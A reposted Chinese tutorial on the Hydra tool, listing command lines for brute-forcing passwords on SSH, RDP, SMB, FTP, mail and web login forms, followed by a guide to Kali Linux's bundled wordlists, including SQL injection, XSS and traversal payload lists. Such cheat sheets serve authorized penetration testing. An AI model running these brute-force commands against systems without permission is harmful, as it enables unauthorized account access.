热门标签
热门文章
- 1Python中的iter()与next()函数_calliter.__next__()
- 2Zabbix绘制流量拓扑图_zabbix 流量地图
- 3Anaconda3 下载安装及不同python环境配置(Linux/Windows)_如何下载到指定python版本的anaconda
- 4基于YOLOv8/YOLOv7/YOLOv6/YOLOv5的智能监考系统(Python+PySide6界面+训练代码)
- 52022完整版:云计算面试题和答案(学习复习资料)_云计算售前面试
- 6pip换源命令(一行命令完成)
- 7Python打包exe和生成安装程序_python生产安装包
- 8Java项目:博客论坛管理系统(java+SpringBoot+JSP+LayUI+maven+mysql)_layui制作论坛列表带内容系统
- 9黑客爱用的HOOK技术大揭秘!_hook计算机是什么意思
- 10在 Java 中实现单例模式通常有两种方法_java两种单例创建
当前位置: article > 正文
hydra工具的使用 (暴力破解密码)及kali自带字典说明_hydra自带字典
作者:笔触狂放9 | 2024-02-22 16:00:47
赞
踩
hydra自带字典
官网:http://www.thc.org/thc-hydra
https://blog.csdn.net/qq_42342141/article/details/106390594
常见使用方法
破解ssh的密码
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh
- 1
破解https:
hydra -m /index.php -l username -P pass.txt IP https
- 1
破解teamspeak:
hydra -l user.txt -P password.txt -s 端口号 -vV ip teamspeak
- 1
破解smb:
hydra -l administrator -P pass.txt IP smb
- 1
破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
- 1
破解rdp:
hydra IP rdp -l administrator -P pass.txt -V
- 1
破解http-proxy:
hydra -l admin -P pass.txt http-proxy://0.0.0.0
- 1
破解telnet
hydra IP telnet -l user.txt -P password.txt -t 32 -s 23 -e ns -f -V
- 1
破解ftp:
hydra IP ftp -l user.txt -P password.txt -t 线程(默认16) -vV
hydra IP ftp -l -l user.txt -P password.txt -e ns -vV
- 1
- 2
- 3
get方式提交,破解web登录:
hydra -l user.txt -P password.txt -t 线程 -vV -e ns IP http-get /admin/
hydra -l user.txt -P password.txt -t 线程 -vV -e ns -f IP http-get /admin/index.php
- 1
- 2
- 3
post方式提交,破解web登录:
hydra -l user.txt -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
- 1
破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
- 1
- 2
kali自带字典
路径:/usr/share/wordlists/
例如:dirb文件夹中
dirb
big.txt #大的字典
small.txt #小的字典
catala.txt #项目配置字典
common.txt #公共字典
euskera.txt #数据目录字典
extensions_common.txt #常用文件扩展名字典
indexes.txt #首页字典
mutations_common.txt #备份扩展名
spanish.txt #方法名或库目录
others #扩展目录,默认用户名等
stress #压力测试
vulns #漏洞测试
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
dirbuster
apache-user-enum-** #apache用户枚举
directories.jbrofuzz #目录枚举
directory-list-1.0.txt #目录列表大,中,小 big,medium,small
- 1
- 2
- 3
fern-wifi
common.txt #公共wifi账户密码
- 1
metasploit
… #各种类型的字典
webslayer
general #普通字典目录 admin-panels.txt #后台路径 字典 Injections #注入字典目录 All_attack.txt #全部*** bad_chars.txt #字符注入 SQL.txt #sql注入 Traversal.txt #路径回溯 XML.txt #xml注入 XSS.txt #xxs注入 others #扩展目录 common_pass.txt #通用密码字典 names.txt #用户名字典 stress #压力测试目录 vulns #漏洞测试目录 apache、iis、cgis... webservicces #web服务目录 ws-dirs.txt #路径测试 ws-files.txt #文件测试
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
wfuzz 模糊测试
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/130751
推荐阅读
相关标签
